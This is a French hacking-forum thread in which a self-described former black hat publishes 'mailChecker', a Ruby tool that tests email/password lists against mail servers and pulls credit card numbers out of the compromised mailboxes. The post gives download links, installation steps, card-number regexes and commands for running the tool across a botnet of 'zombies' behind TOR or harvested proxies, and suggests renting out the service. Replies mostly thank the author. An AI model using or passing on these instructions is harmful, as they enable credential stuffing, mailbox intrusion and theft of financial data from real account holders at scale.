Annonce

Réduire
Aucune annonce.

mailChecker - email list password checker and data extractor

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • mailChecker - email list password checker and data extractor

    Bonjour à tous.

    Suite à la présentation d'un service payant appelé "xPassword" sur un autre topic, j'avais dit que j'irai repêcher un de mes vieux scripts d'ex chapeau noir. Chose promise, chose due !

    Voici donc un script qui permet de tester rapidement des listes de mails / mots de passe, et extraire du contenu des messageries les données utiles (CC, comptes de jeu en lignes ou autres).

    Le petit outil s'appelle mailChecker. Celui-ci est conçu pour fonctionner en deux modes distincts.

    - Un mode single (où vous ne disposez que de votre propre poste pour effectuer le travail)
    - Un mode distribué conçu pour être déployé sur un botnet. Dans ce cas, vous devez déployer le programme en mode serveur sur les zombies, et lancer le programme en mode maitre sur votre machine.
    - Une forte résistance à la panne. Lorsqu'un ou plusieurs bots passent hors ligne, leur travail est automatiquement réparti sur les bots restants.

    Le programme est aussi capable de masquer votre identité en utilisant TOR, ou des listes de proxys SOCKS. Dans le cas où vous ne disposez pas de listes à jour, le programme peut automatiquement mettre sa liste à jour en allant récupérer des proxys frais depuis le net.



    Si vous avez un dépôt GIT, ce serait sympa d'héberger le projet. En attendant, je poste le code source ici dans une archive tar.gz.

    REMARQUE : Ce programme a été conçu comme un petit outil perso. Sa publication n'a jamais été prévue, ce qui explique certains points flemme-cracra dans le code. Celui-ci a été écris avec une vieille version de ruby (à l'époque). Je l'ai mis à jour vite fait. Il tourne sur ruby 1.9.1. Vous devrez cependant corriger un bug dans uns des gems officiels du projet ruby (Socksify ? je ne sais plus...).

    Enfin, pas grand chose à faire pour que ça marche. Après, il reste pleins de trucs à faire pour rendre le projet propre.

    http://www.openbio.fr/index.php?s=file_download&id=7
    ou
    http://www.mediafire.com/download/5s...Checker.tar.gz

    Code:
    Usage: mailchecker [MODE] [OPTIONS]
    
    mailChecker [v 0.8.1] : email list password checker and data extractor. This program
    can be used to automatically scan a large number of email accounts and fetch
    any interresting content (see /resources/regexmatchers.rb). This program can
    be used in single mode, listen mode (for botnet use), and master mode (botnet
    control).
    
    MAILLIST.CSV
         If not in listen mode, you MUST provide an email / password list in CSV format.
         The CSV separator MUST be tab
    
    Options
        -p, --proxy PROXYIP:PORT         Use some user defined proxy (SOCKS 5 only !). Set this option to use the TOR network.
        -c, --check-tor                  Checks that TOR network is properly configured.
        -m, --maillist MAILIST.CSV       Use this mailist to check email/password couples. The mail list must be in CSV format, each line must be like [email protected]\tpassword .
        -b, --botnet BOTNETIPS.TXT       Use this option to delegate work to running instances of mailchecker in listen mode on your zombies. The .txt file must contains an IP:PORT list. The port to use is the one used by slave instance (listen mode) of mailchecker running on the zombie.
        -v, --verbose                    Activate verbose mode.
        -a, --autoproxy                  Fetch automatically a proxy list from search engine, test it and use it
        -z PROXYLISTFILE.txt,            Test and use custom proxy list file. The proxy file format must be in text format, each line shall use the following format: proxyip:port
            --proxylist
        -n, --noproxy                    Use non-anonymous direct connection.
        -h, --help                       Display this manual
        -l, --listen PORT                Listen mode. Activates service mode using specified port. --password argment must be setted. Use this mode when mailchecker is deployed on your zombies.
        -w, --password PASSWORD          Password needed to use mailchecker service in listen mode.
    Remarque: Quand le programme tourne en mode master, vous pouvez vérifier l'état d'avancement des taches sur les différents bots en envoyant au programme maitre le signal qui va bien:

    kill -SIGUSR1 {PID}

    Quand j'aurai un moment, j'écrirai le manuel.


    TUTORIEL _________________________

    Voici les informations qui vous permettront d'utiliser le programme comme il faut. La procédure ci dessous a été réalisé sur Ubuntu 13.


    INSTALLATION

    1 - Récupérer le code source.
    2 - Décompresser l'archive

    Code:
    $ tar -xvf mailChecker.tar.gz
    4 - Installer ruby 1.9.1

    Code:
    $ sudo apt-get install ruby1.9.1
    5 - Installer les différents gems requis

    Code:
    $ sudo gem install rubyzip
    $ sudo gem install ipaddress
    $ sudo gem install socksify
    $ sudo gem install simplews
    $ sudo gem install soap4r
    $ sudo gem install socksify
    $ sudo gem install colorize
    $ sudo gem install zip-zip
    Si vous lancez le programme dès à présent, vous aurez l'erreur suivante :

    Code:
    /var/lib/gems/1.9.1/gems/soap4r-1.5.8/lib/xsd/xmlparser.rb:74:in `<top (required)>': XML processor module not found. (RuntimeError)
    Il est nécessaire de corriger une régression dans xmlparser.rb à la ligne 76

    Code:
    $ sudo vim /var/lib/gems/1.9.1/gems/soap4r-1.5.8/lib/xsd/xmlparser.rb
    Remplacez

    c.downcase == name

    par

    c.to_s.downcase == name

    Vous pouvez ensuite lancer le programme

    Code:
    cd ./mailChecker/lib
    ruby ./mailchecker.rb
    CONFIGURATION

    Si vous avez correctement réalisé les manipulations décrites au dessus, vus devriez voir le manuel s'afficher

    Code:
    Usage: mailchecker [MODE] [OPTIONS]
    
    mailChecker [v 0.8.1] : email list password checker and data extractor. This program
    can be used to automatically scan a large number of email accounts and fetch
    any interresting content (see /resources/regexmatchers.rb). This program can
    be used in single mode, listen mode (for botnet use), and master mode (botnet
    control).
    
    MAILLIST.CSV
         If not in listen mode, you MUST provide an email / password list in CSV format.
         The CSV separator MUST be tab
    
    Options
        -p, --proxy PROXYIP:PORT         Use some user defined proxy (SOCKS 5 only !). Set this option to use the TOR network.
        -c, --check-tor                  Checks that TOR network is properly configured.
        -m, --maillist MAILIST.CSV       Use this mailist to check email/password couples. The mail list must be in CSV format, each line must be like [email protected]\tpassword .
        -b, --botnet BOTNETIPS.TXT       Use this option to delegate work to running instances of mailchecker in listen mode on your zombies. The .txt file must contains an IP:PORT list. The port to use is the one used by slave instance (listen mode) of mailchecker running on the zombie.
        -v, --verbose                    Activate verbose mode.
        -a, --autoproxy                  Fetch automatically a proxy list from search engine, test it and use it
        -z PROXYLISTFILE.txt,            Test and use custom proxy list file. The proxy file format must be in text format, each line shall use the following format: proxyip:port
            --proxylist
        -n, --noproxy                    Use non-anonymous direct connection.
        -h, --help                       Display this manual
        -l, --listen PORT                Listen mode. Activates service mode using specified port. --password argment must be setted. Use this mode when mailchecker is deployed on your zombies.
        -w, --password PASSWORD          Password needed to use mailchecker service in listen mode.
    Le programme peut fonctionner directement sur votre poste ou être déployé sur un botnet.

    Pour vérifier une liste de mails, transformez votre liste vers un format csv utilisant le séparateur tabulation. Votre fichier csv est alors de la forme suivante:

    Code:
    [email protected]	123passwordx
    [email protected]	xxx
    [email protected]	123password
    Le ficher de liste de mails doit être indiqué avec l'option -m si nécessaire.

    Suivant que vous souhaitez être anonyme ou non , vous pouvez utiliser les options suivantes :
    --proxy : Permet d'utiliser un proxy SOCKS
    --autoproxy : Le programme va directement chercher sur internet les proxys qu'il va tester et utiliser
    --proxylist : Le programme va utiliser une liste de proxys au format texte (chaque ligne doit être au format proxyip:address)
    --noproxy : Se connecte directement, sans masquer son identité

    Ci dessous voici un exemple de fichier liste de proxys:

    Code:
    101.55.12.75:1080
    50.131.252.186:29662
    222.88.155.3:1080
    111.207.146.125:1080
    88.190.12.131:9865
    61.152.200.187:8080
    42.121.14.41:1080
    183.61.243.9:1080
    210.27.145.144:1080
    42.121.29.122:1080
    61.147.67.2:9124
    118.69.198.212:1080
    211.167.76.180:1080
    42.121.82.151:1080
    189.2.252.100:1080
    115.156.165.3:1080
    119.184.214.18:1080
    222.85.131.98:1080
    221.238.142.199:1080
    61.144.222.144:1080
    112.95.164.35:1080
    186.120.97.26:6588
    76.111.9.108:22841
    67.170.229.143:54322
    208.185.48.27:1080
    180.153.139.246:8887
    61.136.68.76:1080
    Pour spécifier au soft ce que vous recherchez dans les boites mails, vous devez éditer le fichier /resources/regexmatcher.rb . Ce fichier contient les regex utilisés pour repérer les données d’intérêt. Chaque mail qui contient une ou plusieurs chaines de caractères correspondant à une de ces regexs sera copié par le programme pour y effectuer des analyses ultérieures.

    Par défaut, le fichier regexmatcher.rb est le suivant:

    Code:
    {
        :cc_amex  => /3[47][0-9]{13}/,
        :cc_visa => /4[0-9]{12}(?:[0-9]{3})?/,
        :cc_mastercard => /5[1-5][0-9]{14}/,
        :cc_dnsclb => /3(?:0[0-5]|[68][0-9])[0-9]{11}/,
        :cc_discover => /6(?:011|5[0-9]{2})[0-9]{12}/,
        :cc_jcb => /(?:2131|1800|35\d{3})\d{11}/
    }
    Il permet de rechercher les mails contenant des données relatives aux cartes de crédit American Express, Visa, Mastercard, Discover, DNSCLB et jcb.

    MODE SINGLE

    Dans l'exemple suivant, nous configurons le soft pour utiliser tor (proxy a 127.0.0.1:9150) pour aller scanner le contenu des boites mails:

    Code:
    $ ruby ./mailchecker.rb -p 127.0.0.1:9150 -c -m ../test/resources/mail_list.csv
    [!] Checking if TOR is properly configured
    [!] TOR was sucessfully configured
    [!] Need to check 1 proxie(s)
    * Proxy... 127.0.0.1:9150		[ALIVE]
    [!] 3 emails added
    [!] Starting 5 threads, spinning the turtle again !
    ... etc.
    Le résultat de l'analyse est rangé dans un sous dossier du dossier /out Ce sous dossier contient un fichier csv contenant tous les couples mail / password valides, et un ensemble de fichiers commençant par "regex" contenant les emails ayant matchés avec l'expression régulière associée.

    Remarque : Le contenu des emails est encodé en base64 dans ces fichiers.

    MODE BOTNET

    Pour utiliser le soft avec votre botnet, il faut mettre le programme en mode écoute sur chacun des zombies, puis fournir la liste des IP : ports associés au programme maitre qui se chargera de contrôler les zombies.

    Pour mettre le programme en mode écoute (serveur), vous devrez l'utiliser sur vos zombies de la façon suivante:

    Code:
    ruby ./mailchecker.rb -l 8798 -w password -n
    L'option -l indique le port qu'utilisera le programme pour écouter les instructions du maître (ici 8798).
    L'option -w indique le mot de passe qui devra être fourni pour utiliser le service.

    Remarque : On peut combiner les options classiques de "masquage" d'identité. Au quel cas, avant de taper sur les serveurs de messageries, vos zombies utiliseront le proxy voulu. Dans l'exemple ci dessus, l'utilisation de proxy est désactivé par l'option -n et la connexion aux serveurs de messagerie se fait directement.

    Remarque : Plusieurs maitres peuvent utiliser simultanément le même botnet, ce qui vous laisse la possibilité de louer votre service de scan de messagerie sur botnet.

    Une fois les services déployés sur vos zombies, vous devez démarrer une instance maître en mode botnet master. Pour ce faire, vous devez créer un fichier csv contenant toutes les IP : port de vos zombies ainsi que les mots de passe associés.

    Dans notre exemple ci dessus, et avec un seul zombie (1.2.3.4), notre fichier botnet.csv ressemblerait donc à ça (L'espace entre le port 8798 et le mot de passe DEVANT être une tabulation.):

    Code:
    1.2.3.4:8798 password
    La commande pour lancer le programme maitre est alors la suivante:

    Code:
    ruby ./mailchecker.rb -b ../test/resources/botnet.txt -m ../test/resources/mail_list.csv -n
    Dans l'exemple ci dessus, la connexion entre le maitre et les bots n'est pas anonyme. Vous pouvez tout à fait utiliser les options -p -z ou -a pour plus de discrétion.

    Le travail du botnet peut être assez long. Pour vérifier l'état d'avancement, vous devez envoyer un signal USR1 au programme maitre. Commencez par repérer le PID du programme maitre:

    Code:
    :~$ sudo ps -e | grep ruby
    [sudo] password for XXX: 
    23673 pts/14   00:00:00 ruby
    Notre PID est donc 23673.

    Puis envoyez le signal qui va bien:

    Code:
    :~$ sudo kill -SIGUSR1 23673
    Un tableau s'affiche alors du côté du programme maitre:

    Code:
    Botnet work status
    ________________________________________________________________
    | BOT                   |  OK   |  KO   |  UNK  |   TOT         |
    |_______________________|_______|_______|_______|_______________|
    | 127.0.0.1:8287	| 1	| 0	| 1	|   [50.0%]	|
    | 127.0.0.1:8288	| 0	| 0	| 1	|   [0.0%]	|
    |_______________________|_______|_______|_______|_______________|
    ---> Total : 1 / 3 - [33.33333333333333%]
    La colonne BOT vous indique les ips : port des différents zombies.
    La colonne OK vous indique le nombre de couples mail / password valides
    La colonne KO vous indique le nombre de couples mail / password faux
    La colonne UNK vous indique le nombre de couples mail / password qui n'ont pas encore été testés
    La colonne TOT vous présente l'état d'avancement du travail du bot.

    La ligne inférieure vous présente le taux de mails analysés sur le nombre de mails total à vérifier.

    Remarque : Si un de vos zombies devient soudainement DOWN, son travail est automatiquement transféré vers un zombie encore UP. Ce qui vous assure la continuité et l'inégrité de l'analyse.

    Une fois les analyses terminés, les résultats sont rapatriés sur la machine maitre dans le dossier /out

    Remarque finale, le mode écoute publie un service SOAP. Du coup, il est facile d'écrire vos propres softs de contrôle a partir de la WSDL si vous voulez un truc plus poussé.
    Dernière modification par fred, 09 juillet 2014, 20h23. Motif: Modification ancien lien filedropper
    OxyGen Software
    Sécurité, développement, formations, informatique biomédicale
    [email protected]

  • #2
    J'aime les gens qui tiennent leurs promesses !

    (Je crois que j'ai un tuto SE à faire maintenant ^^)
    Writer, Cyber Security Enthusiast! Follow me on Twitter: @SwitHak

    Commentaire


    • #3
      Merci du partage.
      À but éducatif évidemment


      Suivre Hackademics: Twitter, Google+, Facebook.

      Commentaire


      • #4
        Nice. Tout comme LOMBRE, j'aime les gens qui tiennent parole
        ++ la turtle.
        sigpic

        Cyprium Download Link

        Plus j'étudie plus j'me rends compte que je n'sais rien.

        †|

        Commentaire


        • #5
          je pense que je vais pas tarder a reprendre des couleurs... merci pour le partage

          Commentaire


          • #6
            Tant que ton chapeau reste blanc évidemment


            Suivre Hackademics: Twitter, Google+, Facebook.

            Commentaire


            • #7
              Voilà, j'ai transféré le tuto dans le message d'origine.
              Dernière modification par TorTukiTu, 11 juin 2014, 11h18.
              OxyGen Software
              Sécurité, développement, formations, informatique biomédicale
              [email protected]

              Commentaire


              • #8
                Great, merci du tuto d'utilisation


                Suivre Hackademics: Twitter, Google+, Facebook.

                Commentaire


                • #9
                  Bonjour,

                  Merci du partage !
                  Et comme au dessus, j'aime les personnes qui tiennent parole.

                  Amicalement,
                  Samuel M.

                  Commentaire


                  • #10
                    Salut à tous. Le lien filedropper est mort, je voulais éditer le post pour y faire figurer le nouveau lien:

                    www.openbio.fr/index.php?s=file_download&id=7

                    Mais il semblerai que je n'ai plus la permission d'éditer mes propres posts...

                    Si un admin pouvait réparer ca... fait

                    Merci.
                    Dernière modification par fred, 09 juillet 2014, 20h24.
                    OxyGen Software
                    Sécurité, développement, formations, informatique biomédicale
                    [email protected]

                    Commentaire


                    • #11
                      Site down chez moi, si quelqu'un a l'archive et peut la reupload ce serait bien sympa !
                      Mon blog : http://rootsheep.info

                      Commentaire


                      • #12
                        Je ne l'ai plus sous le coude.
                        Je vois ça avec Tortu, merci d'avoir reporté le down.


                        Suivre Hackademics: Twitter, Google+, Facebook.

                        Commentaire


                        • #13
                          Bonsoir,

                          Je up l'archive originale en attendant que tortu actualise son lien : ICI
                          Writer, Cyber Security Enthusiast! Follow me on Twitter: @SwitHak

                          Commentaire


                          • #14
                            Merci beaucoup !
                            Mon blog : http://rootsheep.info

                            Commentaire


                            • #15
                              Merci à toi t'as tenu promesse

                              Commentaire

                              Chargement...
                              X